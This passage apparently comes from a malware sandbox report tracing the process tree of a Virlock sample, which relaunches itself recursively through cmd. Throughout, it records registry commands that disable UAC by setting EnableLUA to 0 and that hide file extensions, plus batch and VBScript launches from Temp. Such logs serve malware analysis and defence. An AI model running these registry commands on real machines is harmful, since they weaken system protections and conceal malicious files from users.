        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        84⤵
        
        PID:900
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        85⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        86⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        87⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        88⤵
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        89⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        90⤵
        
        PID:472
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        91⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        92⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        93⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        94⤵
        
        PID:548
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        95⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        96⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        97⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        98⤵
        
        PID:1776
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        99⤵
        
        PID:1356
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        100⤵
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        101⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        102⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        103⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        104⤵
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        105⤵
        
        PID:1228
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        106⤵
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        107⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        108⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        109⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        110⤵
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        111⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        112⤵
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        113⤵
        
        PID:1968
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        114⤵
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        115⤵
        
        PID:2696
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        116⤵
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        117⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        118⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        119⤵
        
        PID:2588
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        120⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        121⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        122⤵
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        123⤵
        
        PID:1216
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        124⤵
        
        PID:268
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        125⤵
        
        PID:2104
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        126⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        127⤵
        
        PID:828
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        128⤵
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        129⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock"
        130⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
        
        C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock
        131⤵
        
        PID:876
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        132⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        132⤵
        
        PID:1280
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        132⤵
        UAC bypass
        
        PID:1696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        130⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        130⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        130⤵
        UAC bypass
        
        PID:2668
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\LuMQcwMQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        130⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        131⤵
        
        PID:2772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        128⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        128⤵
        Modifies registry key
        
        PID:1656
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        128⤵
        UAC bypass
        
        PID:1576
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\AaMUQsYY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        128⤵
        
        PID:664
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        129⤵
        
        PID:1684
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        126⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        126⤵
        Modifies registry key
        
        PID:708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        126⤵
        UAC bypass
        
        PID:2872
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Qswscwks.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        126⤵
        
        PID:1192
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        127⤵
        
        PID:288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        124⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        124⤵
        Modifies registry key
        
        PID:1700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        124⤵
        UAC bypass
        Modifies registry key
        
        PID:1736
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\BuUEMQEI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        124⤵
        
        PID:1904
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        125⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        122⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        122⤵
        Modifies registry key
        
        PID:3056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        122⤵
        UAC bypass
        
        PID:2148
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\pQEAossc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        122⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        123⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        120⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        120⤵
        
        PID:1748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        120⤵
        UAC bypass
        
        PID:888
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\sMoYYwsc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        120⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        121⤵
        
        PID:312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        118⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        118⤵
        
        PID:2792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        118⤵
        UAC bypass
        
        PID:1080
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\KsAEwsUk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        118⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        119⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        116⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        116⤵
        
        PID:876
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        116⤵
        UAC bypass
        
        PID:2076
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\VmEIgQck.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        116⤵
        
        PID:2596
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        117⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        114⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        114⤵
        
        PID:2232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        114⤵
        
        PID:1168
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\lGwMMMwI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        114⤵
        
        PID:2640
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        115⤵
        
        PID:1892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        112⤵
        Modifies visibility of file extensions in Explorer
        
        PID:708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        112⤵
        Modifies registry key
        
        PID:2552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        112⤵
        UAC bypass
        
        PID:828
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\zEIkYcso.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        112⤵
        
        PID:1820
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        113⤵
        
        PID:2544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        110⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        110⤵
        Modifies registry key
        
        PID:2920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        110⤵
        UAC bypass
        Modifies registry key
        
        PID:1736
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\IeUsgwgc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        110⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        111⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        108⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        108⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        108⤵
        UAC bypass
        Modifies registry key
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\sgAAIEQs.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        108⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        109⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        106⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        106⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        106⤵
        UAC bypass
        
        PID:548
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\vskUEoQg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        106⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        107⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        104⤵
        Modifies visibility of file extensions in Explorer
        
        PID:868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        104⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        104⤵
        UAC bypass
        
        PID:620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\KykQoUwA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        104⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        105⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        102⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2804
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        102⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        102⤵
        UAC bypass
        
        PID:664
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RIMAsIss.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        102⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        103⤵
        
        PID:2016
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        100⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        100⤵
        Modifies registry key
        
        PID:2696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        100⤵
        UAC bypass
        
        PID:2564
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\QkckMggY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        100⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        101⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        98⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        98⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        98⤵
        UAC bypass
        
        PID:1540
        
        C:\Windows\SysWOW64\cmd.exe
        
